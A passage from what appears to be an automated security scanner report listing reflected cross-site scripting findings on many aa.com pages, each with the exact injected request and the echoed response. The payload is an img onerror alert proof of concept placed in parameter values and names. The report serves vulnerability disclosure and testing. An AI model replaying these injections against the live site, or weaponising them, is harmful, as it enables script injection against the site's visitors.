GET /i18n/reservations/paymentOptions/electronicChecks.jsp?cee2e"><img%20src%3da%20onerror%3dalert(1)>a952f7fc535=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109726


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="cee2e"><img src=a onerror=alert(1)>a952f7fc535" value="1" />
...[SNIP]...

1.41. https://www.aa.com/i18n/reservations/paymentOptions/main.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/main.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b58c1"><img%20src%3da%20onerror%3dalert(1)>185d4f1d9f6 was submitted in the from parameter. This input was echoed as b58c1"><img src=a onerror=alert(1)>185d4f1d9f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/reservations/paymentOptions/main.jsp?from=Navb58c1"><img%20src%3da%20onerror%3dalert(1)>185d4f1d9f6 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:38:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118383


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Navb58c1"><img src=a onerror=alert(1)>185d4f1d9f6" />
...[SNIP]...

1.42. https://www.aa.com/i18n/reservations/paymentOptions/main.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/main.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dfbc"><img%20src%3da%20onerror%3dalert(1)>afd497f0c97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1dfbc"><img src=a onerror=alert(1)>afd497f0c97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/reservations/paymentOptions/main.jsp?1dfbc"><img%20src%3da%20onerror%3dalert(1)>afd497f0c97=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:38:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118371


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="1dfbc"><img src=a onerror=alert(1)>afd497f0c97" value="1" />
...[SNIP]...

1.43. https://www.aa.com/i18n/reservations/paymentOptions/payPal.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/payPal.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5969"><img%20src%3da%20onerror%3dalert(1)>45c1c93f316 was submitted in the from parameter. This input was echoed as a5969"><img src=a onerror=alert(1)>45c1c93f316 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/reservations/paymentOptions/payPal.jsp?from=Nava5969"><img%20src%3da%20onerror%3dalert(1)>45c1c93f316 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108809


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nava5969"><img src=a onerror=alert(1)>45c1c93f316" />
...[SNIP]...

1.44. https://www.aa.com/i18n/reservations/paymentOptions/payPal.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/payPal.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47ca9"><img%20src%3da%20onerror%3dalert(1)>29a51661631 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47ca9"><img src=a onerror=alert(1)>29a51661631 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/reservations/paymentOptions/payPal.jsp?47ca9"><img%20src%3da%20onerror%3dalert(1)>29a51661631=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108794


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="47ca9"><img src=a onerror=alert(1)>29a51661631" value="1" />
...[SNIP]...

1.45. https://www.aa.com/i18n/travelInformation/duringFlight/cabinComfort.jsp [anchorEvent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/cabinComfort.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1f3c"><img%20src%3da%20onerror%3dalert(1)>5c089a9e1a0 was submitted in the anchorEvent parameter. This input was echoed as d1f3c"><img src=a onerror=alert(1)>5c089a9e1a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/duringFlight/cabinComfort.jsp?anchorEvent=falsed1f3c"><img%20src%3da%20onerror%3dalert(1)>5c089a9e1a0&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107747


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="falsed1f3c"><img src=a onerror=alert(1)>5c089a9e1a0" />
...[SNIP]...

1.46. https://www.aa.com/i18n/travelInformation/duringFlight/cabinComfort.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/cabinComfort.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3f11"><img%20src%3da%20onerror%3dalert(1)>e02e0bf745e was submitted in the from parameter. This input was echoed as d3f11"><img src=a onerror=alert(1)>e02e0bf745e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/duringFlight/cabinComfort.jsp?anchorEvent=false&from=Navd3f11"><img%20src%3da%20onerror%3dalert(1)>e02e0bf745e HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107753


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Navd3f11"><img src=a onerror=alert(1)>e02e0bf745e" />
...[SNIP]...

1.47. https://www.aa.com/i18n/travelInformation/duringFlight/cabinComfort.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/cabinComfort.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c41f3"><img%20src%3da%20onerror%3dalert(1)>0ccbf2d3c1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c41f3"><img src=a onerror=alert(1)>0ccbf2d3c1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/duringFlight/cabinComfort.jsp?c41f3"><img%20src%3da%20onerror%3dalert(1)>0ccbf2d3c1b=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107693


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="c41f3"><img src=a onerror=alert(1)>0ccbf2d3c1b" value="1" />
...[SNIP]...

1.48. https://www.aa.com/i18n/travelInformation/duringFlight/dining/dining.jsp [anchorEvent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/dining/dining.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba20c"><img%20src%3da%20onerror%3dalert(1)>1436892150e was submitted in the anchorEvent parameter. This input was echoed as ba20c"><img src=a onerror=alert(1)>1436892150e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/duringFlight/dining/dining.jsp?anchorEvent=falseba20c"><img%20src%3da%20onerror%3dalert(1)>1436892150e&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114825


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="falseba20c"><img src=a onerror=alert(1)>1436892150e" />
...[SNIP]...

1.49. https://www.aa.com/i18n/travelInformation/duringFlight/dining/dining.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/dining/dining.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da3eb"><img%20src%3da%20onerror%3dalert(1)>b18ca81b5c4 was submitted in the from parameter. This input was echoed as da3eb"><img src=a onerror=alert(1)>b18ca81b5c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/duringFlight/dining/dining.jsp?anchorEvent=false&from=Navda3eb"><img%20src%3da%20onerror%3dalert(1)>b18ca81b5c4 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114825


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Navda3eb"><img src=a onerror=alert(1)>b18ca81b5c4" />
...[SNIP]...

1.50. https://www.aa.com/i18n/travelInformation/duringFlight/dining/dining.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/dining/dining.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f567"><img%20src%3da%20onerror%3dalert(1)>ad7e1690ea9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f567"><img src=a onerror=alert(1)>ad7e1690ea9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/duringFlight/dining/dining.jsp?2f567"><img%20src%3da%20onerror%3dalert(1)>ad7e1690ea9=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114762


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="2f567"><img src=a onerror=alert(1)>ad7e1690ea9" value="1" />
...[SNIP]...

1.51. https://www.aa.com/i18n/travelInformation/duringFlight/entertainment/main.jsp [anchorEvent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/entertainment/main.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb9de"><img%20src%3da%20onerror%3dalert(1)>a7510ce8c8b was submitted in the anchorEvent parameter. This input was echoed as bb9de"><img src=a onerror=alert(1)>a7510ce8c8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/duringFlight/entertainment/main.jsp?anchorEvent=falsebb9de"><img%20src%3da%20onerror%3dalert(1)>a7510ce8c8b&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 115821


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="falsebb9de"><img src=a onerror=alert(1)>a7510ce8c8b" />
...[SNIP]...

1.52. https://www.aa.com/i18n/travelInformation/duringFlight/entertainment/main.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/entertainment/main.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload baf65"><img%20src%3da%20onerror%3dalert(1)>7a937f825b8 was submitted in the from parameter. This input was echoed as baf65"><img src=a onerror=alert(1)>7a937f825b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/duringFlight/entertainment/main.jsp?anchorEvent=false&from=Navbaf65"><img%20src%3da%20onerror%3dalert(1)>7a937f825b8 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 115809


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Navbaf65"><img src=a onerror=alert(1)>7a937f825b8" />
...[SNIP]...

1.53. https://www.aa.com/i18n/travelInformation/duringFlight/entertainment/main.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/entertainment/main.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a822a"><img%20src%3da%20onerror%3dalert(1)>8b28951e5a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a822a"><img src=a onerror=alert(1)>8b28951e5a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/duringFlight/entertainment/main.jsp?a822a"><img%20src%3da%20onerror%3dalert(1)>8b28951e5a1=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 115758


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="a822a"><img src=a onerror=alert(1)>8b28951e5a1" value="1" />
...[SNIP]...

1.54. https://www.aa.com/i18n/travelInformation/duringFlight/onboardTechnology.jsp [anchorEvent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/onboardTechnology.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d61b"><img%20src%3da%20onerror%3dalert(1)>0acc542d09c was submitted in the anchorEvent parameter. This input was echoed as 4d61b"><img src=a onerror=alert(1)>0acc542d09c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/duringFlight/onboardTechnology.jsp?anchorEvent=false4d61b"><img%20src%3da%20onerror%3dalert(1)>0acc542d09c&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114704


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="false4d61b"><img src=a onerror=alert(1)>0acc542d09c" />
...[SNIP]...

1.55. https://www.aa.com/i18n/travelInformation/duringFlight/onboardTechnology.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/onboardTechnology.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca250"><img%20src%3da%20onerror%3dalert(1)>001bb0afa00 was submitted in the from parameter. This input was echoed as ca250"><img src=a onerror=alert(1)>001bb0afa00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/duringFlight/onboardTechnology.jsp?anchorEvent=false&from=Navca250"><img%20src%3da%20onerror%3dalert(1)>001bb0afa00 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114704


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Navca250"><img src=a onerror=alert(1)>001bb0afa00" />
...[SNIP]...

1.56. https://www.aa.com/i18n/travelInformation/duringFlight/onboardTechnology.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/onboardTechnology.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 433f7"><img%20src%3da%20onerror%3dalert(1)>496f0c36f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 433f7"><img src=a onerror=alert(1)>496f0c36f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/duringFlight/onboardTechnology.jsp?433f7"><img%20src%3da%20onerror%3dalert(1)>496f0c36f2=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114640


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="433f7"><img src=a onerror=alert(1)>496f0c36f2" value="1" />
...[SNIP]...

1.57. https://www.aa.com/i18n/travelInformation/specialAssistance/childrenTraveling.jsp [anchorEvent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/childrenTraveling.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cc09"><img%20src%3da%20onerror%3dalert(1)>a65a16f66dd was submitted in the anchorEvent parameter. This input was echoed as 5cc09"><img src=a onerror=alert(1)>a65a16f66dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/childrenTraveling.jsp?anchorEvent=false5cc09"><img%20src%3da%20onerror%3dalert(1)>a65a16f66dd&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 142463


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="false5cc09"><img src=a onerror=alert(1)>a65a16f66dd" />
...[SNIP]...

1.58. https://www.aa.com/i18n/travelInformation/specialAssistance/childrenTraveling.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/childrenTraveling.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fb48"><img%20src%3da%20onerror%3dalert(1)>a4bb67d167e was submitted in the from parameter. This input was echoed as 4fb48"><img src=a onerror=alert(1)>a4bb67d167e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/childrenTraveling.jsp?anchorEvent=false&from=Nav4fb48"><img%20src%3da%20onerror%3dalert(1)>a4bb67d167e HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 142454


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav4fb48"><img src=a onerror=alert(1)>a4bb67d167e" />
...[SNIP]...

1.59. https://www.aa.com/i18n/travelInformation/specialAssistance/childrenTraveling.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/childrenTraveling.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2464e"><img%20src%3da%20onerror%3dalert(1)>a096f60c964 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2464e"><img src=a onerror=alert(1)>a096f60c964 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/childrenTraveling.jsp?2464e"><img%20src%3da%20onerror%3dalert(1)>a096f60c964=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 142400


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="2464e"><img src=a onerror=alert(1)>a096f60c964" value="1" />
...[SNIP]...

1.60. https://www.aa.com/i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp [anchorEvent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e513a"><img%20src%3da%20onerror%3dalert(1)>210b0fbc24c was submitted in the anchorEvent parameter. This input was echoed as e513a"><img src=a onerror=alert(1)>210b0fbc24c in the application's response.

